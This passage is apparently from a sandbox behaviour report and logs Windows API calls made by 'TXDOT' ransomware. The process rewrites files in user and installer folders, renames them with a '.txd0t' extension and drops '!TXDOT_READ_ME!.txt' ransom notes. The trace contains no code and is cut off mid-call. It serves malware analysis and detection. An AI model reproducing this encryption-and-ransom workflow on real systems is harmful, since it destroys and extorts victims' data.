StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4.txd0t" [0077.131] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4.txd0t") returned 0 [0077.131] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4", dwFileAttributes=0x80) returned 1 [0077.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\r47nb711z06w9.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0077.131] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=37836) returned 1 [0077.132] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.132] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0077.132] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff6a34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.132] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x93c0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x93c0, lpOverlapped=0x0) returned 1 [0077.133] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff6c40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.133] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x93c0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x93c0, lpOverlapped=0x0) returned 1 [0077.134] FlushFileBuffers (hFile=0x474) returned 1 [0077.135] GetProcessHeap () returned 0xe30000 [0077.135] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xed2558 [0077.135] StrCpyW (in: psz1=0xed2558, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4" [0077.135] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4") returned="r47Nb711Z06w9.mp4" [0077.135] StrCpyW (in: psz1=0xed2598, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0077.135] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\!TXDOT_READ_ME!.txt") returned 1 [0077.136] GetProcessHeap () returned 0xe30000 [0077.136] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2558 | out: hHeap=0xe30000) returned 1 [0077.136] CloseHandle (hObject=0x474) returned 1 [0077.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\r47nb711z06w9.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\wlta\\r47nb711z06w9.mp4.txd0t")) returned 1 [0077.138] SetEvent (hEvent=0x3f8) returned 1 [0077.138] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0078.203] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0079.251] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0080.290] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0081.320] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0082.346] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0083.627] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0085.042] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0085.226] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" [0085.227] StrCatW (in: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", psz2=".txd0t" | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.txd0t") returned="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.txd0t" [0085.227] PathFileExistsW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.txd0t") returned 0 [0085.227] SetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", dwFileAttributes=0x80) returned 1 [0085.228] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0085.228] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=42674) returned 1 [0085.229] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.229] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0085.230] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff574e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.230] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xa6b0, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0xa6b0, lpOverlapped=0x0) returned 1 [0085.232] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff5950, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.232] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xa6b0, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0xa6b0, lpOverlapped=0x0) returned 1 [0085.232] FlushFileBuffers (hFile=0x474) returned 1 [0085.420] GetProcessHeap () returned 0xe30000 [0085.420] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xe9b648 [0085.420] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" [0085.420] PathFindFileNameW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned="downlevel_2017_09_07_02_02_39_766.log" [0085.420] StrCpyW (in: psz1=0xe9b678, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.420] PathFileExistsW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0085.420] GetProcessHeap () returned 0xe30000 [0085.420] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0085.420] CloseHandle (hObject=0x474) returned 1 [0085.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.txd0t" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.txd0t")) returned 1 [0085.432] SetEvent (hEvent=0x3f8) returned 1 [0085.432] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0085.433] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" [0085.433] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.txd0t" [0085.433] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.txd0t") returned 0 [0085.433] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.434] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0085.434] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=3726) returned 1 [0085.434] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.434] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0085.436] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffef72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.437] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xe80, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0xe80, lpOverlapped=0x0) returned 1 [0085.437] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffff180, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.437] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0xe80, lpOverlapped=0x0) returned 1 [0085.437] FlushFileBuffers (hFile=0x474) returned 1 [0085.499] GetProcessHeap () returned 0xe30000 [0085.499] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe41328 [0085.499] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" [0085.499] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf") returned="eula.rtf" [0085.499] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.499] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1029\\!TXDOT_READ_ME!.txt") returned 0 [0085.499] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1029\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0085.501] WriteFile (in: hFile=0x478, lpBuffer=0x37ff484*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x37ff484*, lpNumberOfBytesWritten=0x37ff480*=0x2, lpOverlapped=0x0) returned 1 [0085.502] FlushFileBuffers (hFile=0x478) returned 1 [0085.506] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff480*=0x7f0, lpOverlapped=0x0) returned 1 [0085.508] FlushFileBuffers (hFile=0x478) returned 1 [0085.516] CloseHandle (hObject=0x478) returned 1 [0085.516] GetProcessHeap () returned 0xe30000 [0085.516] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0085.516] CloseHandle (hObject=0x474) returned 1 [0085.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.txd0t")) returned 1 [0085.517] SetEvent (hEvent=0x3f8) returned 1 [0085.517] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0085.518] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" [0085.518] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.txd0t" [0085.518] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.txd0t") returned 0 [0085.519] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.529] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0085.529] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=8876) returned 1 [0085.529] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.529] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0085.531] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffdb54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.531] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x22a0, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x22a0, lpOverlapped=0x0) returned 1 [0085.533] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffdd60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.533] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x22a0, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x22a0, lpOverlapped=0x0) returned 1 [0085.533] FlushFileBuffers (hFile=0x474) returned 1 [0085.540] GetProcessHeap () returned 0xe30000 [0085.540] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.540] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" [0085.540] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf") returned="eula.rtf" [0085.540] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.540] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1032\\!TXDOT_READ_ME!.txt") returned 0 [0085.540] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1032\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0085.546] WriteFile (in: hFile=0x478, lpBuffer=0x37ff484*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x37ff484*, lpNumberOfBytesWritten=0x37ff480*=0x2, lpOverlapped=0x0) returned 1 [0085.547] FlushFileBuffers (hFile=0x478) returned 1 [0085.549] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff480*=0x7f0, lpOverlapped=0x0) returned 1 [0085.549] FlushFileBuffers (hFile=0x478) returned 1 [0085.551] CloseHandle (hObject=0x478) returned 1 [0085.551] GetProcessHeap () returned 0xe30000 [0085.551] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.551] CloseHandle (hObject=0x474) returned 1 [0085.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.txd0t")) returned 1 [0085.551] SetEvent (hEvent=0x3f8) returned 1 [0085.551] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0085.552] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" [0085.552] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.txd0t" [0085.552] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.txd0t") returned 0 [0085.553] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.553] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0085.553] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=3188) returned 1 [0085.553] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.553] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0085.555] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffff18c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.555] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xc70, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0xc70, lpOverlapped=0x0) returned 1 [0085.555] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffff390, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.555] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xc70, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0xc70, lpOverlapped=0x0) returned 1 [0085.555] FlushFileBuffers (hFile=0x474) returned 1 [0085.557] GetProcessHeap () returned 0xe30000 [0085.557] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.557] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" [0085.557] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf") returned="eula.rtf" [0085.557] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.557] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1033\\!TXDOT_READ_ME!.txt") returned 0 [0085.558] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1033\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0085.559] WriteFile (in: hFile=0x478, lpBuffer=0x37ff484*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x37ff484*, lpNumberOfBytesWritten=0x37ff480*=0x2, lpOverlapped=0x0) returned 1 [0085.560] FlushFileBuffers (hFile=0x478) returned 1 [0085.562] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff480*=0x7f0, lpOverlapped=0x0) returned 1 [0085.563] FlushFileBuffers (hFile=0x478) returned 1 [0085.564] CloseHandle (hObject=0x478) returned 1 [0085.564] GetProcessHeap () returned 0xe30000 [0085.564] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.564] CloseHandle (hObject=0x474) returned 1 [0085.564] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.txd0t")) returned 1 [0085.565] SetEvent (hEvent=0x3f8) returned 1 [0085.565] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0085.568] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" [0085.568] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.txd0t" [0085.568] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.txd0t") returned 0 [0085.568] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.568] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0085.568] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=77232) returned 1 [0085.569] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.569] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0085.570] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffed050, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.570] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x12db0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x12db0, lpOverlapped=0x0) returned 1 [0085.635] SetFilePointerEx (in: hFile=0x474, 